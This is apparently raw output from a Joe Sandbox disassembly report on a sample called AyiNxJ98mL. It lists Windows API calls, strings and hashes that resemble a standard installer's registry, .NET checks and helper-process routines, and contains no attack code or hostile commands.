                                                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                              • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                              • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                              • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                              • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                              • API String ID: 971782779-3668018701
                                                              • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                              • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                              • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                              • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
                                                              APIs
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
                                                                • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                              • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
                                                              • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
                                                              • , xrefs: 004548EA
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
                                                              • RegOpenKeyEx, xrefs: 004548FC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$FormatMessageOpen
                                                              • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                              • API String ID: 2812809588-1577016196
                                                              • Opcode ID: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                              • Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
                                                              • Opcode Fuzzy Hash: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                              • Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
                                                              APIs
                                                                • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
                                                                • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
                                                              Strings
                                                              • v2.0.50727, xrefs: 004598BF
                                                              • .NET Framework version %s not found, xrefs: 0045996D
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
                                                              • .NET Framework not found, xrefs: 00459981
                                                              • v1.1.4322, xrefs: 00459926
                                                              • v4.0.30319, xrefs: 00459855
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
                                                              • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Close$Open
                                                              • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                              • API String ID: 2976201327-446240816
                                                              • Opcode ID: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                              • Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
                                                              • Opcode Fuzzy Hash: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                              • Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
                                                              APIs
                                                              • CloseHandle.KERNEL32(?), ref: 00458DDF
                                                              • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
                                                              • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
                                                              • GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
                                                              • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
                                                              • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
                                                              Strings
                                                              • Helper process exited, but failed to get exit code., xrefs: 00458E53
                                                              • Helper isn't responding; killing it., xrefs: 00458DEB
                                                              • Helper process exited., xrefs: 00458E29
                                                              • Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
                                                              • Helper process exited with failure code: 0x%x, xrefs: 00458E47
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                              • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                              • API String ID: 3355656108-1243109208
                                                              • Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                              • Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
                                                              • Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                              • Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
                                                              APIs
                                                                • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                                • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                              Strings
                                                              • RegCreateKeyEx, xrefs: 004545AF
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                              • , xrefs: 0045459D
                                                              • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFormatMessageQueryValue
                                                              • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                              • API String ID: 2481121983-1280779767
                                                              • Opcode ID: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                              • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                              • Opcode Fuzzy Hash: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                              • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                              APIs
                                                                • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                              • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                              • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                              • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                              • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                                • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                              • 73A25CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                              • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                              • API String ID: 170458502-2312673372
                                                              • Opcode ID: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                              • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                              • Opcode Fuzzy Hash: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                              • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseHandleModuleProc
                                                              • String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                              • API String ID: 4190037839-1003587384
                                                              • Opcode ID: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                              • Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
                                                              • Opcode Fuzzy Hash: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                              • Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 00462D68
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
                                                              • GetWindowRect.USER32(?,00000000), ref: 00462DE2
                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                              • API String ID: 2610873146-3407710046
                                                              • Opcode ID: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                              • Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
                                                              • Opcode Fuzzy Hash: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                              • Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
                                                              APIs
                                                              • GetActiveWindow.USER32 ref: 0042F1A4
                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
                                                              • GetWindowRect.USER32(?,00000000), ref: 0042F21E
                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                              • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                              • API String ID: 2610873146-3407710046
                                                              • Opcode ID: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                              • Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
                                                              • Opcode Fuzzy Hash: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                              • Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
                                                              APIs
                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02113858,00000000), ref: 00458FDD
                                                              • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                              • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                              • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                              • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02113858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                              • String ID: CreateEvent$TransactNamedPipe
                                                              • API String ID: 2182916169-3012584893
                                                              • Opcode ID: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                              • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                              • Opcode Fuzzy Hash: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                              • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                              • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                              • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorHandleLastLoadModuleProcType
                                                              • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                              • API String ID: 1914119943-2711329623
                                                              • Opcode ID: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                              • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                              • Opcode Fuzzy Hash: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                              • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                              APIs
                                                              • RectVisible.GDI32(?,?), ref: 00416E23
                                                              • SaveDC.GDI32(?), ref: 00416E37
                                                              • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                              • RestoreDC.GDI32(?,?), ref: 00416E75
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                              • FrameRect.USER32(?,?,?), ref: 00416F28
                                                              • DeleteObject.GDI32(?), ref: 00416F32
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                              • FrameRect.USER32(?,?,?), ref: 00416F75
                                                              • DeleteObject.GDI32(?), ref: 00416F7F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                              • String ID:
                                                              • API String ID: 375863564-0
                                                              • Opcode ID: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                              • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                              • Opcode Fuzzy Hash: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                              • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
